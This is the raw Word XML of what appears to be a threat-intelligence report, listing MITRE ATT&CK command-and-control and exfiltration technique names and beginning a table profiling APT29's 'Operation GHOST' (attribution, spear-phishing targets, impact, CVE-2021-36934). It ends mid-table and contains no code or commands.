          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EC2C26">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1071.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EC2C26">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Application Layer Protocol&gt;:Web Protocols</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3F12D2"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T1090.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Proxy&gt;:Internal Proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C1DD40"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T1102.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Web Service&gt;:Bidirectional Communication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C51CDB8"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T1001.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Data Obfuscation&gt;:Steganography</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694DF424"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Next Technique is T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1095 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Non-Application Layer Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9C034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T1090.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Proxy&gt;:Multi-hop Proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7236EB2C"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t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1090.004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Proxy&gt;:Domain Fronting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE8E74D" w14:textId="77777777" w:rsidR="00BB4629" w:rsidRPr="00BB4629"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0010 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Exfiltration ['T1048.002']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FE5999" w14:textId="77777777" w:rsidR="00BB4629" w:rsidRPr="00BB4629" w:rsidRDefault="00BB4629" w:rsidP="00BB4629">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EC2C26">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1048.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EC2C26">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Exfiltration Over Alternative Protocol&gt;:Exfiltration Over Asymmetric Encrypted Non-C2 Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB90079" w14:textId="0CC0409D" w:rsidR="00BB4629" w:rsidRPr="00EC7728" w:rsidRDefault="00BB4629" w:rsidP="00BB4629">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Next tactic is TA</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0040 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB4629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Impact []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453C943D" w14:textId="77777777" w:rsidR="00EC7728" w:rsidRPr="005935F8" w:rsidRDefault="00EC7728" w:rsidP="00EC7728">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7045D4C2" w14:textId="2CF02DA0" w:rsidR="00F80381" w:rsidRDefault="00D176DA" w:rsidP="00D176DA">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="54" w:name="_Toc153480854"/>
      <w:r>
        <w:t>T1156.001, T1078 - OPERATION GHOST The Dukes aren’t back — they never left</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>
    </w:p>
    <w:p w14:paraId="41FFFBDB" w14:textId="77777777" w:rsidR="00F80381" w:rsidRDefault="00F80381" w:rsidP="00F80381">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F80381" w:rsidRPr="002D1D50" w14:paraId="46A5F6DB" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="146DD142" w14:textId="77777777" w:rsidR="00F80381" w:rsidRPr="002D1D50" w:rsidRDefault="00F80381" w:rsidP="004F4BCB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Dimension</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54019C81" w14:textId="77777777" w:rsidR="00F80381" w:rsidRPr="002D1D50" w:rsidRDefault="00F80381" w:rsidP="004F4BCB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5CDDDE4C" w14:textId="77777777" w:rsidR="00F80381" w:rsidRPr="00387DCC" w:rsidRDefault="00F80381" w:rsidP="004F4BCB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00387DCC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C045CA" w:rsidRPr="00B857D7" w14:paraId="1F431220" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E728EC9" w14:textId="77777777" w:rsidR="00C045CA" w:rsidRDefault="00C045CA" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Attribution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BDCAF73" w14:textId="300DC742" w:rsidR="00C045CA" w:rsidRDefault="00C045CA" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>APT29</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C43C757" w14:textId="52E81892" w:rsidR="00C045CA" w:rsidRPr="00387DCC" w:rsidRDefault="007418B5" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F80381" w:rsidRPr="00B857D7" w14:paraId="30E02928" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67FC02F4" w14:textId="77777777" w:rsidR="00F80381" w:rsidRPr="007328DE" w:rsidRDefault="00F80381" w:rsidP="004F4BCB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Initial Access Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A0A2AD9" w14:textId="77777777" w:rsidR="00F80381" w:rsidRPr="007328DE" w:rsidRDefault="00F80381" w:rsidP="004F4BCB">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031AA95E" w14:textId="12FA2632" w:rsidR="00F80381" w:rsidRPr="00387DCC" w:rsidRDefault="007418B5" w:rsidP="004F4BCB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[6] </w:t>
            </w:r>
            <w:r w:rsidRPr="007418B5">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">The second attack wave that </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007418B5">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Volexity</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007418B5">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> observed leveraged a Microsoft Word document with a malicious embedded macro</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F80381" w:rsidRPr="00B857D7" w14:paraId="38B051D2" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2297AB3E" w14:textId="77777777" w:rsidR="00F80381" w:rsidRDefault="00F80381" w:rsidP="004F4BCB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Attack Origin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F912D7C" w14:textId="03CDF7BE" w:rsidR="00F80381" w:rsidRPr="007328DE" w:rsidRDefault="00631A54" w:rsidP="004F4BCB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Russia</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F8ABE38" w14:textId="55CB51DF" w:rsidR="00F80381" w:rsidRPr="00387DCC" w:rsidRDefault="006F2362" w:rsidP="004F4BCB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Via ATT&amp;CK</w:t>
            </w:r>
            <w:r w:rsidR="00212ADE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>/TCERT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F80381" w:rsidRPr="00B857D7" w14:paraId="12B04F6F" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F3FB948" w14:textId="77777777" w:rsidR="00F80381" w:rsidRDefault="00F80381" w:rsidP="004F4BCB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2AB3F0C0" w14:textId="2508D8CE" w:rsidR="00F80381" w:rsidRDefault="006F2362" w:rsidP="004F4BCB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>US</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5427B750" w14:textId="5DCB8CDE" w:rsidR="00F80381" w:rsidRPr="00387DCC" w:rsidRDefault="006F2362" w:rsidP="004F4BCB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[6] </w:t>
            </w:r>
            <w:r w:rsidR="00D1186A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:r w:rsidRPr="006F2362">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>he Dukes launched several waves of highly targeted spear phishing attacks against several U.S.-based think tanks and NGOs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F80381" w:rsidRPr="00B857D7" w14:paraId="50DF5A1C" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10E400DC" w14:textId="77777777" w:rsidR="00F80381" w:rsidRDefault="00F80381" w:rsidP="004F4BCB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1601BFDB" w14:textId="6E2D596A" w:rsidR="00F80381" w:rsidRDefault="006F2362" w:rsidP="004F4BCB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F2362">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>U.S.-based think tank</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C29F66B" w14:textId="080EB493" w:rsidR="00F80381" w:rsidRPr="00387DCC" w:rsidRDefault="006F2362" w:rsidP="004F4BCB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[6] See above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F80381" w:rsidRPr="00B857D7" w14:paraId="425E8F60" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2390CBF3" w14:textId="77777777" w:rsidR="00F80381" w:rsidRDefault="00F80381" w:rsidP="004F4BCB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04ECF2B6" w14:textId="2D46F78C" w:rsidR="00F80381" w:rsidRDefault="00515289" w:rsidP="00D63CD3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Exfiltration (confidentiality)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1127E3E5" w14:textId="3A460946" w:rsidR="00F80381" w:rsidRDefault="00F80381" w:rsidP="004F4BCB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F80381" w:rsidRPr="00B857D7" w14:paraId="75565459" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40AF1EC8" w14:textId="77777777" w:rsidR="00F80381" w:rsidRDefault="00F80381" w:rsidP="004F4BCB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Vulnerabilities Exploited</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="193CAE62" w14:textId="6A22DF1A" w:rsidR="00F80381" w:rsidRDefault="00CD088D" w:rsidP="004F4BCB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>CVE-2021-36934</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47FAA344" w14:textId="77777777" w:rsidR="00F80381" w:rsidRDefault="00F80381" w:rsidP="004F4BCB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F80381" w:rsidRPr="00B857D7" w14:paraId="0CF851B1" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BEEC2B6" w14:textId="77777777" w:rsidR="00F80381" w:rsidRDefault="00F80381" w:rsidP="004F4BCB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Related Attack Patterns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61B074A4" w14:textId="77777777" w:rsidR="00F80381" w:rsidRDefault="00F80381" w:rsidP="004F4BCB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49779E14" w14:textId="21411EE0" w:rsidR="00F80381" w:rsidRDefault="00F80381" w:rsidP="004F4BCB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00947A0B" w:rsidRPr="00B857D7" w14:paraId="095590A7" w14:textId="77777777" w:rsidTr="0016701B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2908A200" w14:textId="77777777" w:rsidR="00947A0B" w:rsidRDefault="00947A0B" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Preceded By</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B3BADB2" w14:textId="7452F742" w:rsidR="00947A0B" w:rsidRDefault="00FD3F47" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>NA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B835B62"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5CD3BB94" w14:textId="77777777" w:rsidTr="0016701B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="329B062C" w14:textId="77777777" w:rsidR="00947A0B" w:rsidRDefault="00947A0B" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Schema Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0048A5F9" w14:textId="77777777" w:rsidR="00947A0B" w:rsidRDefault="00947A0B" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E13E8B7" w14:textId="77777777" w:rsidR="00947A0B" w:rsidRDefault="00947A0B" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>To allow for future new chain models</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F80381" w:rsidRPr="00B857D7" w14:paraId="7D145440" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D62A069" w14:textId="2D367445" w:rsidR="00F80381" w:rsidRDefault="00947A0B" w:rsidP="004F4BCB">
            <w:pPr>
